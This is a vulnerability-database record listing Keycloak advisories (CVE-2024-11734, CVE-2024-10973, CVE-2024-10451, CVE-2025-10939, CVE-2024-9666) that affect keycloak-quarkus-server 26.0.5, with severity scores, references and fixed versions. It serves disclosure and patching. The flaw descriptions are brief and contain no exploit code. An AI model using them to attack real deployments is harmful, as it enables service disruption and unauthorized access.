Lookup for vulnerable packages by Package URL.

purl pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.5
type maven
namespace org.keycloak
name keycloak-quarkus-server
version 26.0.5
qualifiers
subpath
is_vulnerable true
next_non_vulnerable_version 26.5.6
latest_non_vulnerable_version 26.5.6
affected_by_vulnerabilities
0
url VCID-13cd-jace-rfdu
vulnerability_id VCID-13cd-jace-rfdu
summary
Denial of Service in Keycloak Server via Security Headers
A potential Denial of Service (DoS) vulnerability has been identified in Keycloak, which could allow an administrative user with the rights to change realm settings to disrupt the service. This is done by modifying any of the security headers and inserting newlines, which causes the Keycloak server to write to a request that is already terminated, leading to a failure of said request.

Service disruption may happen, users will be unable to access applications relying on Keycloak, or any of the consoles provided by Keycloak itself on the affected realm.
references
0
reference_url https://access.redhat.com/errata/RHSA-2025:0299
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-14T14:44:48Z/
url https://access.redhat.com/errata/RHSA-2025:0299
1
reference_url https://access.redhat.com/errata/RHSA-2025:0300
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-14T14:44:48Z/
url https://access.redhat.com/errata/RHSA-2025:0300
2
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-11734.json
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-11734.json
3
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-11734
reference_id
reference_type
scores
0
value 0.00048
scoring_system epss
scoring_elements 0.15367
published_at 2026-06-09T12:55:00Z
1
value 0.00048
scoring_system epss
scoring_elements 0.15474
published_at 2026-06-05T12:55:00Z
2
value 0.00048
scoring_system epss
scoring_elements 0.15465
published_at 2026-06-06T12:55:00Z
3
value 0.00048
scoring_system epss
scoring_elements 0.15424
published_at 2026-06-07T12:55:00Z
4
value 0.00048
scoring_system epss
scoring_elements 0.1534
published_at 2026-06-08T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-11734
4
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2328846
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-14T14:44:48Z/
url https://bugzilla.redhat.com/show_bug.cgi?id=2328846
5
reference_url https://github.com/keycloak/keycloak
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak
6
reference_url https://github.com/keycloak/keycloak/commit/93b2a7327b2557eb132a8169086c5e63c81dff79
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/commit/93b2a7327b2557eb132a8169086c5e63c81dff79
7
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:26.0
reference_id cpe:/a:redhat:build_keycloak:26.0
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:26.0
8
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:26.0::el9
reference_id cpe:/a:redhat:build_keycloak:26.0::el9
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:26.0::el9
9
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:jbosseapxp
reference_id cpe:/a:redhat:jbosseapxp
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:jbosseapxp
10
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:jboss_enterprise_application_platform:8
reference_id cpe:/a:redhat:jboss_enterprise_application_platform:8
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:jboss_enterprise_application_platform:8
11
reference_url https://access.redhat.com/security/cve/CVE-2024-11734
reference_id CVE-2024-11734
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-14T14:44:48Z/
url https://access.redhat.com/security/cve/CVE-2024-11734
12
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-11734
reference_id CVE-2024-11734
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-11734
13
reference_url https://github.com/advisories/GHSA-w3g8-r9gw-qrh8
reference_id GHSA-w3g8-r9gw-qrh8
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-w3g8-r9gw-qrh8
14
reference_url https://github.com/keycloak/keycloak/security/advisories/GHSA-w3g8-r9gw-qrh8
reference_id GHSA-w3g8-r9gw-qrh8
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/security/advisories/GHSA-w3g8-r9gw-qrh8
fixed_packages
0
url pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.8
purl pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.8
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-a1me-1k15-2kdt
1
vulnerability VCID-cax3-qsfb-yfc9
2
vulnerability VCID-vtut-sg7s-xqf4
3
vulnerability VCID-wgaj-esqz-27fk
4
vulnerability VCID-zv3y-skx5-53ge
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.8
aliases CVE-2024-11734, GHSA-w3g8-r9gw-qrh8
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-13cd-jace-rfdu
1
url VCID-4hfv-fbdp-37gr
vulnerability_id VCID-4hfv-fbdp-37gr
summary
Duplicate Advisory: Keycloak vulnerable to Cleartext Transmission of Sensitive Information
# Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-g6qq-c9f9-2772. This link is maintained to preserve external references.

# Original Description
A vulnerability was found in Keycloak. The environment option `KC_CACHE_EMBEDDED_MTLS_ENABLED` does not work and the JGroups replication configuration is always used in plain text which can allow an attacker that has access to adjacent networks related to JGroups to read sensitive information.
references
0
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2324361
reference_id
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://bugzilla.redhat.com/show_bug.cgi?id=2324361
1
reference_url https://github.com/keycloak/keycloak
reference_id
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak
2
reference_url https://github.com/keycloak/keycloak/commit/071032a108bd9e9fce9e66d00c36d56bd4b334df
reference_id
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/commit/071032a108bd9e9fce9e66d00c36d56bd4b334df
3
reference_url https://github.com/keycloak/keycloak/commit/36defd5f33b2da5d705f179bbaa21c28b13a9996
reference_id
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/commit/36defd5f33b2da5d705f179bbaa21c28b13a9996
4
reference_url https://github.com/keycloak/keycloak/issues/28750
reference_id
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/issues/28750
5
reference_url https://github.com/keycloak/keycloak/issues/34644
reference_id
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/issues/34644
6
reference_url https://github.com/keycloak/keycloak/pull/28756
reference_id
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/pull/28756
7
reference_url https://github.com/keycloak/keycloak/pull/34668
reference_id
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/pull/34668
8
reference_url https://access.redhat.com/security/cve/CVE-2024-10973
reference_id CVE-2024-10973
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/security/cve/CVE-2024-10973
9
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-10973
reference_id CVE-2024-10973
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-10973
10
reference_url https://github.com/advisories/GHSA-6mpx-pmgp-ww49
reference_id GHSA-6mpx-pmgp-ww49
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-6mpx-pmgp-ww49
fixed_packages
0
url pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.6
purl pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.6
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-13cd-jace-rfdu
1
vulnerability VCID-a1me-1k15-2kdt
2
vulnerability VCID-cax3-qsfb-yfc9
3
vulnerability VCID-hq42-c3pr-qkbf
4
vulnerability VCID-vtut-sg7s-xqf4
5
vulnerability VCID-wgaj-esqz-27fk
6
vulnerability VCID-zv3y-skx5-53ge
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.6
aliases GHSA-6mpx-pmgp-ww49
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-4hfv-fbdp-37gr
2
url VCID-7drn-skjh-xkga
vulnerability_id VCID-7drn-skjh-xkga
summary
Duplicate Advisory: Keycloak Build Process Exposes Sensitive Data
## Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-v7gv-xpgf-6395. This link is maintained to preserve external references.

## Original Description
A flaw was found in Keycloak. This issue occurs because sensitive runtime values, such as passwords, may be captured during the Keycloak build process and embedded as default values in bytecode, leading to unintended information disclosure. In Keycloak 26, sensitive data specified directly in environment variables during the build process is also stored as default values, making it accessible at runtime. Indirect usage of environment variables for SPI options and Quarkus properties is also vulnerable due to unconditional expansion by PropertyMapper logic, capturing sensitive data as default values in all Keycloak versions up to 26.0.2.
references
0
reference_url https://access.redhat.com/errata/RHSA-2024:10175
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2024:10175
1
reference_url https://access.redhat.com/errata/RHSA-2024:10176
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2024:10176
2
reference_url https://access.redhat.com/errata/RHSA-2024:10177
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2024:10177
3
reference_url https://access.redhat.com/errata/RHSA-2024:10178
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2024:10178
4
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2322096
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://bugzilla.redhat.com/show_bug.cgi?id=2322096
5
reference_url https://access.redhat.com/security/cve/CVE-2024-10451
reference_id CVE-2024-10451
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/security/cve/CVE-2024-10451
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-10451
reference_id CVE-2024-10451
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-10451
7
reference_url https://github.com/advisories/GHSA-jcgg-mg9g-p9wf
reference_id GHSA-jcgg-mg9g-p9wf
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-jcgg-mg9g-p9wf
fixed_packages
0
url pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.6
purl pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.6
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-13cd-jace-rfdu
1
vulnerability VCID-a1me-1k15-2kdt
2
vulnerability VCID-cax3-qsfb-yfc9
3
vulnerability VCID-hq42-c3pr-qkbf
4
vulnerability VCID-vtut-sg7s-xqf4
5
vulnerability VCID-wgaj-esqz-27fk
6
vulnerability VCID-zv3y-skx5-53ge
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.6
aliases GHSA-jcgg-mg9g-p9wf
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-7drn-skjh-xkga
3
url VCID-a1me-1k15-2kdt
vulnerability_id VCID-a1me-1k15-2kdt
summary
Keycloak unable to restrict access to the admin console
A flaw was found in Keycloak. The Keycloak guides recommend not exposing the /admin path to the outside when the installation is using a proxy. The issue occurs at least via ha-proxy, which can be tricked into using relative/non-normalized paths to access the /admin application path relative to /realms, which is expected to be exposed.
references
0
reference_url https://access.redhat.com/errata/RHSA-2025:21370
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-28T20:01:48Z/
url https://access.redhat.com/errata/RHSA-2025:21370
1
reference_url https://access.redhat.com/errata/RHSA-2025:21371
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-28T20:01:48Z/
url https://access.redhat.com/errata/RHSA-2025:21371
2
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-10939.json
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-10939.json
3
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-10939
reference_id
reference_type
scores
0
value 0.00013
scoring_system epss
scoring_elements 0.02298
published_at 2026-06-09T12:55:00Z
1
value 0.00013
scoring_system epss
scoring_elements 0.0241
published_at 2026-06-05T12:55:00Z
2
value 0.00013
scoring_system epss
scoring_elements 0.02406
published_at 2026-06-06T12:55:00Z
3
value 0.00013
scoring_system epss
scoring_elements 0.02354
published_at 2026-06-07T12:55:00Z
4
value 0.00013
scoring_system epss
scoring_elements 0.0234
published_at 2026-06-08T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-10939
4
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2398025
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-28T20:01:48Z/
url https://bugzilla.redhat.com/show_bug.cgi?id=2398025
5
reference_url https://github.com/keycloak/keycloak
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak
6
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:26.4::el9
reference_id cpe:/a:redhat:build_keycloak:26.4::el9
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:26.4::el9
7
reference_url https://access.redhat.com/security/cve/CVE-2025-10939
reference_id CVE-2025-10939
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-28T20:01:48Z/
url https://access.redhat.com/security/cve/CVE-2025-10939
8
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-10939
reference_id CVE-2025-10939
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-10939
9
reference_url https://github.com/advisories/GHSA-vjr8-56p3-fmqq
reference_id GHSA-vjr8-56p3-fmqq
reference_type
scores
0
value LOW
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-vjr8-56p3-fmqq
10
reference_url https://github.com/keycloak/keycloak/security/advisories/GHSA-vjr8-56p3-fmqq
reference_id GHSA-vjr8-56p3-fmqq
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system cvssv3.1_qr
scoring_elements
2
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/security/advisories/GHSA-vjr8-56p3-fmqq
fixed_packages
0
url pkg:maven/org.keycloak/keycloak-quarkus-server@26.4.4
purl pkg:maven/org.keycloak/keycloak-quarkus-server@26.4.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-wgaj-esqz-27fk
1
vulnerability VCID-zv3y-skx5-53ge
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.keycloak/keycloak-quarkus-server@26.4.4
aliases CVE-2025-10939, GHSA-vjr8-56p3-fmqq
risk_score 1.6
exploitability 0.5
weighted_severity 3.3
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-a1me-1k15-2kdt
4
url VCID-azrr-bwad-97cs
vulnerability_id VCID-azrr-bwad-97cs
summary
Keycloak proxy header handling Denial-of-Service (DoS) vulnerability
Keycloak versions 26 and earlier are vulnerable to a denial-of-service (DoS) attack through improper handling of proxy headers. When Keycloak is configured to accept incoming proxy headers, it may accept non-IP values, such as obfuscated identifiers, without proper validation. This can lead to costly DNS resolution operations, which an attacker could exploit to tie up IO threads and potentially cause a denial of service.

The attacker must have access to send requests to a Keycloak instance that is configured to accept proxy headers, specifically when reverse proxies do not overwrite incoming headers, and Keycloak is configured to trust these headers.

For Keycloak version 26, successful exploitation requires: the realm must have SslRequired=EXTERNAL (the default), HTTP must be enabled, the instance must not be using a full hostname URL, access must come from behind a proxy (assuming the proxy overwrites the X-Forwarded-For header), and trusted proxies must not be set or must incorrectly trust the client from which the request originates.
references
0
reference_url https://access.redhat.com/errata/RHSA-2024:10175
reference_id
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value 5.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-25T17:14:55Z/
url https://access.redhat.com/errata/RHSA-2024:10175
1
reference_url https://access.redhat.com/errata/RHSA-2024:10176
reference_id
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value 5.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-25T17:14:55Z/
url https://access.redhat.com/errata/RHSA-2024:10176
2
reference_url https://access.redhat.com/errata/RHSA-2024:10177
reference_id
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value 5.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-25T17:14:55Z/
url https://access.redhat.com/errata/RHSA-2024:10177
3
reference_url https://access.redhat.com/errata/RHSA-2024:10178
reference_id
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value 5.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-25T17:14:55Z/
url https://access.redhat.com/errata/RHSA-2024:10178
4
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-9666.json
reference_id
reference_type
scores
0
value 4.7
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-9666.json
5
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-9666
reference_id
reference_type
scores
0
value 0.00014
scoring_system epss
scoring_elements 0.02893
published_at 2026-06-06T12:55:00Z
1
value 0.00014
scoring_system epss
scoring_elements 0.0284
published_at 2026-06-07T12:55:00Z
2
value 0.00014
scoring_system epss
scoring_elements 0.02825
published_at 2026-06-08T12:55:00Z
3
value 0.00014
scoring_system epss
scoring_elements 0.02791
published_at 2026-06-09T12:55:00Z
4
value 0.00014
scoring_system epss
scoring_elements 0.02886
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-9666
6
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2317440
reference_id
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value 5.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-25T17:14:55Z/
url https://bugzilla.redhat.com/show_bug.cgi?id=2317440
7
reference_url https://github.com/keycloak/keycloak
reference_id
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value 5.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak
8
reference_url https://github.com/keycloak/keycloak/issues/35216
reference_id
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value 5.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/issues/35216
9
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:24
reference_id cpe:/a:redhat:build_keycloak:24
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:24
10
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:24::el9
reference_id cpe:/a:redhat:build_keycloak:24::el9
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:24::el9
11
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:26
reference_id cpe:/a:redhat:build_keycloak:26
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:26
12
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:26.0::el9
reference_id cpe:/a:redhat:build_keycloak:26.0::el9
reference_type
scores
